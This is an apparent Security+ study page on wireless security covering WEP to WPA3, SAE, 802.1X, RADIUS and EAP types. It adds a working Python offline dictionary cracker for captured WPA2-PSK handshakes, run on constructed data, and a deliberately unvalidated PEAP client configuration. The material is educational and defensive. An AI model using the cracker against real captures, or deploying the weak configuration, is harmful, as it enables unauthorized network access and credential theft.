Wireless Security Standards
Understanding WPA3, AAA/RADIUS, cryptographic protocols, and authentication methods for wireless networks including 802.1X, EAP types, and enterprise wireless security.
Understanding Wireless Security Standards
Wireless security standards define how networks authenticate users and encrypt traffic. Understanding the evolution from WEP to WPA3 and the role of enterprise authentication (802.1X/RADIUS) is essential for securing wireless networks.
Key wireless security components:
- WPA3 — Latest wireless security standard
- 802.1X — Port-based network access control
- RADIUS — AAA server for authentication, authorization and accounting
- EAP — Extensible Authentication Protocol, the method framework carried inside 802.1X
The 2017 KRACK (Key Reinstallation Attack) research showed that WPA2's 4-way handshake could be abused to make a client reinstall an already-used key, resetting its nonce and packet counters so that captured traffic could be replayed and, in some cases, decrypted. It affected essentially every WPA2 implementation and was fixed with client and access-point patches rather than a new standard. WPA3, announced in 2018, additionally replaces the pre-shared key handshake with SAE, which gives WPA3-Personal forward secrecy that WPA2-PSK never had.
Wireless security has evolved significantly—using outdated protocols creates serious vulnerabilities.
Why This Matters for the Exam
Wireless security standards are heavily tested on SY0-701 because proper implementation is critical. Questions cover WPA versions, EAP types, and enterprise authentication architecture.
Understanding wireless standards helps with network security design, compliance requirements, and vulnerability assessment. Weak wireless security = network compromise.
The exam tests recognition of standards, their security features, and appropriate implementation.
Deep Dive
How Has Wireless Security Evolved?
Wireless Security Timeline:
| Standard | Era | Security Level |
|---|---|---|
| WEP | 1999 | Broken (never use) |
| WPA | 2003 | Legacy (TKIP; avoid) |
| WPA2 | 2004 | Standard (acceptable with AES-CCMP and TKIP disabled) |
| WPA3 | 2018 | Current (preferred) |
Why WEP Failed:
WEP weaknesses:
- Static, manually shared RC4 keys (the same key for every client, rarely rotated)
- 24-bit IV that repeats quickly and exposes keystream reuse
- CRC-32 integrity check, which is not a cryptographic MAC, so attackers can flip bits undetected
- Key recovery in minutes from captured traffic
NEVER use WEP - completely broken
What Are WPA2 and WPA3?
WPA2 Features:
| Feature | Description |
|---|---|
| Encryption | AES-CCMP (strong) |
| Authentication | PSK or Enterprise |
| Key Management | 4-way handshake |
| Weakness | PSK mode: a captured 4-way handshake allows offline dictionary attacks |
WPA3 Improvements:
| Feature | Benefit |
|---|---|
| SAE (Dragonfly) | Replaces PSK in Personal mode, resists offline password guessing |
| Forward secrecy | Past sessions stay protected if the passphrase is later exposed |
| 192-bit security | Optional Enterprise mode using Suite B / CNSA ciphers |
| PMF required | Management frame protection mandatory (blocks deauthentication spoofing) |
| Easy Connect (DPP) | QR-code device onboarding; a separate Wi-Fi Alliance program launched alongside WPA3 |
WPA2 vs WPA3 Comparison:
| Aspect | WPA2 | WPA3 |
|---|---|---|
| Personal auth | PSK (vulnerable to offline guessing) | SAE (Dragonfly) |
| Enterprise auth | 802.1X | 802.1X (192-bit option) |
| Offline attacks | Vulnerable (PSK) | Protected (SAE) |
| Forward secrecy | No (PSK) | Yes (SAE) |
| Management frames | Optional protection | Required protection |
SAE (Simultaneous Authentication of Equals):
WPA2-PSK problem:
- Every client derives the same PMK from the passphrase and SSID (PBKDF2)
- An attacker captures one 4-way handshake (nonces plus a MIC keyed from that PMK)
- Each dictionary guess is checked offline against the captured MIC, with no further contact with the network
- A weak passphrase is eventually recovered
WPA3-SAE solution:
- SAE (Dragonfly) is a password-authenticated key exchange, not a plain key derivation
- A passive capture yields nothing that can verify a password guess
- Each guess requires a live exchange with the AP, so guessing is online and rate-limited
- Every session uses fresh ephemeral values, giving forward secrecy
Caveat: early SAE implementations had side-channel and downgrade weaknesses (the 2019 Dragonblood findings), so keep AP and client firmware current and do not leave WPA2/WPA3 transition mode enabled longer than needed.
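The offline attack above, worked through in code. This is an added example, not code from the original page: it derives the PMK and PTK the way IEEE 802.11i specifies, builds a constructed "captured" handshake from a known passphrase, and then recovers that passphrase from a small wordlist using only the captured bytes. The SSID, MAC addresses, nonces, EAPOL frame and wordlist are constructed test data, not a real capture; the `password`/`IEEE` PBKDF2 vector is the published 802.11i test vector.

```python
"""Added example: why a captured WPA2-PSK 4-way handshake can be attacked offline.
All addresses, nonces and frames below are constructed demo data."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    For CCMP the 48 bytes split into KCK (MIC key), KEK (key-wrap key) and TK (data key)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """Key Descriptor Version 2 (WPA2/CCMP): MIC = first 16 bytes of HMAC-SHA1(KCK, frame)."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Offline attack: every guess is verified locally against the captured MIC.
    The network is never contacted, so nothing throttles or logs the attempts."""
    for candidate in wordlist:
        kck, _, _ = derive_ptk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# --- constructed "capture" (demo data, not a real sniff) ---------------------
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("00112233aabb")        # constructed authenticator address
STA_MAC = bytes.fromhex("66778899ccdd")       # constructed supplicant address
ANONCE = bytes(range(32))                     # constructed; real nonces are random
SNONCE = bytes(range(100, 132))               # constructed
# Stand-in for handshake message 2 with its 16-byte MIC field zeroed. Only the
# structure matters for the demo; it is not a byte-accurate EAPOL-Key frame.
EAPOL_M2_ZEROED = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + SNONCE + b"\x00" * 16
TRUE_PASSPHRASE = "Winter2024"
WORDLIST = ["password", "CorpWiFi", "letmein", "Winter2024", "Summer2024"]


def captured_mic() -> bytes:
    """What a sniffer sees: the MIC the real client computed with the real passphrase."""
    kck, _, _ = derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_M2_ZEROED)


def run_demo():
    """Recover the passphrase from the captured handshake and a wordlist (returns None on miss)."""
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2_ZEROED, captured_mic(), WORDLIST)


if __name__ == "__main__":
    print("recovered passphrase:", run_demo())
```

The only thing the attacker needs from the air is the two nonces, the two MAC addresses and one MIC; everything else is computed locally, and PBKDF2's 4096 iterations are the sole brake on guessing speed. SAE removes the verifier: nothing in a captured SAE exchange lets a guess be checked without the AP's participation.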
What Is 802.1X?
802.1X provides port-based network access control for both wired and wireless networks.
802.1X Components:
| Component | Role |
|---|---|
| Supplicant | Client requesting access |
| Authenticator | AP or switch (enforcer) |
| Authentication Server | RADIUS server (decider) |
802.1X Architecture:
[Supplicant]                 [Authenticator]                  [Auth Server]
(Client/Device)              (AP/Switch)                      (RADIUS)
      |                            |                                |
      |<── EAP-Request/Identity ───|                                |
      |─── EAP-Response/Identity ─>|                                |
      |                            |─── RADIUS Access-Request ─────>|
      |                            |    (EAP-Message attribute)     |
      |<── EAP method exchange, relayed by the authenticator ──────>|
      |                            |<── Access-Accept / Reject ─────|
      |<── EAP-Success / Failure ──|                                |
      |                            |                                |
      | (Accept: controlled port opened, session key material passed to the AP, access granted)
The authenticator decides nothing: it relays EAP between the client and the RADIUS server and enforces the server's answer.
What Is RADIUS?
RADIUS (Remote Authentication Dial-In User Service) provides AAA services.
AAA Functions:
| Function | Purpose |
|---|---|
| Authentication | Verify identity (who are you?) |
| Authorization | Grant permissions (what can you do?) |
| Accounting | Track usage (what did you do?) |
RADIUS in Wireless:
User connects to an 802.1X-protected SSID
↓
AP relays the client's EAP messages to RADIUS (Access-Request with EAP-Message attributes); with tunneled EAP methods the AP never sees the password
↓
RADIUS checks the identity against a directory (AD, LDAP) or validates a certificate
↓
RADIUS returns Access-Accept (with session key material) or Access-Reject
↓
AP grants or denies access
↓
RADIUS logs the session (accounting: Accounting-Request start/stop records)
RADIUS vs TACACS+:
| Aspect | RADIUS | TACACS+ |
|---|---|---|
| Protocol | UDP (1812 auth, 1813 accounting) | TCP (49) |
| Encryption | Only the User-Password attribute is obfuscated (MD5 keyed with the shared secret); everything else is plaintext unless RADIUS/TLS (RadSec) is used | Entire packet body encrypted |
| AAA separation | Authentication and authorization combined in one exchange | Separate |
| Primary use | Network access | Device administration |
What Are EAP Types?
EAP (Extensible Authentication Protocol) provides the authentication framework for 802.1X.
Common EAP Types:
| EAP Type | Certificates | Security |
|---|---|---|
| EAP-TLS | Client + Server | Highest |
| PEAP | Server only | High |
| EAP-TTLS | Server only | High |
| EAP-FAST | Optional (PAC) | High |
| LEAP | None | Weak (avoid; MS-CHAP challenge/response exposed without a tunnel) |
Note: PEAP, EAP-TTLS and EAP-FAST are only as strong as the client's validation of the server certificate. A supplicant that accepts any certificate can be lured to a rogue AP running its own RADIUS server and have its credentials harvested.
EAP-TLS:
Requirements:
- Server certificate
- Client certificate (each device or user)
- PKI infrastructure (CA, enrollment, revocation)
Process:
1. Server presents certificate
2. Client validates server (chain and name)
3. Client presents certificate
4. Server validates client (chain, revocation, mapping to an account)
5. Mutual authentication complete; keying material exported from the TLS session seeds the wireless session keys
Pros: Strongest security; no password to phish or crack
Cons: Certificate management overhead
PEAP (Protected EAP):
Requirements:
- Server certificate
- Username/password (typically)
Process:
1. Outer TLS tunnel established using the server certificate; the client must validate it
2. Credentials sent inside the tunnel
3. Inner authentication (often MS-CHAPv2 against Active Directory)
Pros: No client certificates needed
Cons: Password-based; MS-CHAPv2 on its own is crackable, so all of the protection comes from the tunnel and from clients refusing untrusted server certificates
What Are Personal vs Enterprise Modes?
Personal Mode (PSK):
WPA2-Personal / WPA3-Personal:
- Shared passphrase
- All users share one secret (WPA2: identical PMK for everyone; WPA3-SAE: per-session keys, but still one shared password)
- No individual identity
- Good for home/small office
Limitation: Cannot revoke individual access without changing the passphrase for everyone
Enterprise Mode (802.1X):
WPA2-Enterprise / WPA3-Enterprise:
- Individual credentials (password or certificate)
- RADIUS authentication via 802.1X/EAP
- Per-user/device session keys
- Audit trail (RADIUS accounting)
- Expected for business networks
Benefit: Revoke individual access, track usage
Mode Comparison:
| Aspect | Personal | Enterprise |
|---|---|---|
| Authentication | Shared password | Individual credentials |
| Key derivation | One shared PMK (WPA2: anyone with the passphrase and a captured handshake can decrypt other users' traffic) | Unique PMK per session, delivered by the RADIUS server |
| User tracking | No | Yes |
| Scalability | Limited | Enterprise |
| Complexity | Simple | Requires RADIUS |
How CompTIA Tests This
Example Analysis
Scenario: A company is upgrading their wireless network. Current state: WPA2-Personal with a shared password. Requirements: individual user authentication, audit logging, ability to revoke access, and strongest available security.
Analysis - Wireless Security Upgrade:
Current State Assessment:
WPA2-Personal:
✗ Shared password (everyone knows it, and it leaves with every departing employee)
✗ Cannot track individual users
✗ Cannot revoke a single user without rotating the key everywhere
✗ Vulnerable to offline attacks on a captured handshake
✗ No audit trail
Recommended Architecture:
Standard: WPA3-Enterprise
Why WPA3:
✓ Management frame protection (PMF) is mandatory, blocking deauthentication spoofing
✓ Optional 192-bit mode for high-security segments
✓ Latest security standard
(SAE and its offline-attack protection apply to WPA3-Personal only; in Enterprise mode the per-user keys come from 802.1X/EAP, which is what removes the shared-password weakness)
Why Enterprise:
✓ Individual authentication
✓ Per-user session keys
✓ Audit logging via RADIUS accounting
✓ Can revoke individual access
Authentication Architecture:
[Employees]              [Access Points]            [RADIUS]              [AD]
(Supplicants)            (Authenticators)           (Auth Server)         (Directory)
     |                          |                        |                    |
     |─── Associate to SSID ───>|                        |                    |
     |<── EAP-Request/Identity ─|                        |                    |
     |─── EAP-Response/Identity >|── Access-Request ────>|                    |
     |                          |   (EAP-Message)        |                    |
     |<── Server certificate (PEAP outer TLS) ───────────|                    |
     |    [client validates the RADIUS server certificate]                    |
     |─── MS-CHAPv2 inside the TLS tunnel ──────────────>|─── Validate ─────>|
     |                          |                        |<── Response ──────|
     |                          |<── Access-Accept + key material ──|         |
     |<── EAP-Success ──────────|                        |                    |
     | (Authentication complete - controlled port opened, access granted)     |
EAP Type Selection:
| Option | Security | Complexity | Recommendation |
|---|---|---|---|
| EAP-TLS | Highest | High (client certs) | If PKI exists |
| PEAP | High | Medium | Most common |
| EAP-TTLS | High | Medium | Alternative to PEAP |
Recommendation: PEAP (EAP-MSCHAPv2) on WPA3-Enterprise
Justification:
- No client certificates needed
- Users authenticate with existing AD credentials
- Server certificate lets clients verify the RADIUS server (not the AP itself); with validation enforced, a rogue "evil twin" cannot harvest credentials
- Balance of security and usability
Configuration:
- Server: FreeRADIUS or Microsoft NPS
- Server certificate from the internal CA, with the CA and expected server name pushed to clients (group policy / MDM profile) so they refuse other certificates
- Inner auth: MS-CHAPv2 against AD
- WPA3-Enterprise mode on APs (PMF required)
- If a PKI already exists, EAP-TLS is the stronger choice and removes the password from the picture entirely
Implementation:
| Component | Configuration |
|---|---|
| APs | WPA3-Enterprise, RADIUS client |
| RADIUS | Integrate with Active Directory |
| Certificate | Server cert for EAP |
| Users | AD credentials (existing) |
| Logging | RADIUS accounting enabled |
Access Control:
New employee: Add to AD → Automatic access
Terminated: Disable AD account → Immediate revocation
Guest: Separate SSID, captive portal
Contractor: Time-limited AD account
Key insight: WPA3-Enterprise with PEAP provides individual authentication via existing AD credentials, audit logging through RADIUS accounting, and strong security without the complexity of client certificates, provided supplicants are configured to validate the RADIUS server certificate. This balances security requirements with operational feasibility.
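The recommended build expressed as configuration, as an added example (not configuration from the original page or from any specific vendor): a hostapd access point acting as the 802.1X authenticator for WPA3-Enterprise, and a wpa_supplicant client block for PEAP/MS-CHAPv2 shown first in its weak form (no server certificate validation, the failure mode the page warns about) and then hardened. A commented WPA3-Personal (SAE) variant is included for the Personal-vs-Enterprise comparison. The interface name, SSID, RADIUS address, secrets, user names, CA path and server name are assumptions for illustration.

```ini
# --- hostapd.conf (access point = 802.1X authenticator), relevant lines only ---
# Interface, SSID, RADIUS address and secrets are placeholders.
interface=wlan0
ssid=CorpWiFi
wpa=2
# WPA3-Enterprise: 802.1X key management with PMF mandatory.
# WPA-EAP-SHA256 is the SHA-256 AKM used when PMF is required.
wpa_key_mgmt=WPA-EAP WPA-EAP-SHA256
rsn_pairwise=CCMP
ieee80211w=2
ieee8021x=1
# RADIUS authentication (1812) and accounting (1813); accounting gives the audit trail.
auth_server_addr=10.0.0.5
auth_server_port=1812
auth_server_shared_secret=REPLACE-WITH-LONG-RANDOM-SECRET
acct_server_addr=10.0.0.5
acct_server_port=1813
acct_server_shared_secret=REPLACE-WITH-LONG-RANDOM-SECRET
# Optional 192-bit mode (all clients must support the Suite B ciphers):
# wpa_key_mgmt=WPA-EAP-SUITE-B-192
# rsn_pairwise=GCMP-256
# group_mgmt_cipher=BIP-GMAC-256
# For comparison, WPA3-Personal replaces the 802.1X lines above with SAE:
# wpa_key_mgmt=SAE
# sae_password=REPLACE-WITH-STRONG-PASSPHRASE
# ieee80211w=2

# --- wpa_supplicant.conf (client = supplicant), PEAP/MS-CHAPv2 ----------------
# WEAK: no ca_cert and no server-name check, so the client accepts any RADIUS
# certificate. A rogue AP with its own RADIUS server collects the MS-CHAPv2
# challenge/response and cracks the password offline.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="Winter2024!"
    phase2="auth=MSCHAPV2"
}

# HARDENED: pin the internal CA and the RADIUS server's name, require PMF,
# and send an anonymous outer identity so the username is not visible in clear.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP WPA-EAP-SHA256
    ieee80211w=2
    eap=PEAP
    anonymous_identity="anonymous@corp.example"
    identity="alice@corp.example"
    password="Winter2024!"
    ca_cert="/etc/ssl/certs/corp-root-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
```

In a managed fleet the hardened block is what the group policy or MDM Wi-Fi profile should push (trusted CA, expected server name, no "prompt user to accept certificate" option). The two supplicant blocks differ only in validation settings, which is exactly the difference between PEAP being "high" security and being an MS-CHAPv2 hash collector for anyone with a rogue AP.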
Memory Trick
Wireless Evolution: "WEP = Worst Ever Protocol" (broken) "WPA = Was a Patch, Acceptable briefly" "WPA2 = Was Pretty Adequate" "WPA3 = Way Preferred Always"
802.1X Components - "SAA":
- Supplicant = Seeking access (client)
- Authenticator = AP/switch (enforcer)
- Authentication server = RADIUS (decider)
EAP Types: "TLS = Two certificates (client + server)" "PEAP = Password in tunnel (server cert only)"
RADIUS = AAA:
- Authentication = Who are you?
- Authorization = What can you do?
- Accounting = What did you do?
Personal vs Enterprise: "Personal = Password shared" "Enterprise = Each user individual"
WPA3 SAE Benefit: "SAE = Stops Attackers from External cracking" Offline dictionary attacks don't work
Test Your Knowledge
Q1. Which WPA3 feature protects against offline dictionary attacks?
Q2. In 802.1X architecture, which component makes the authentication decision?
Q3. Which EAP type requires certificates on BOTH client and server?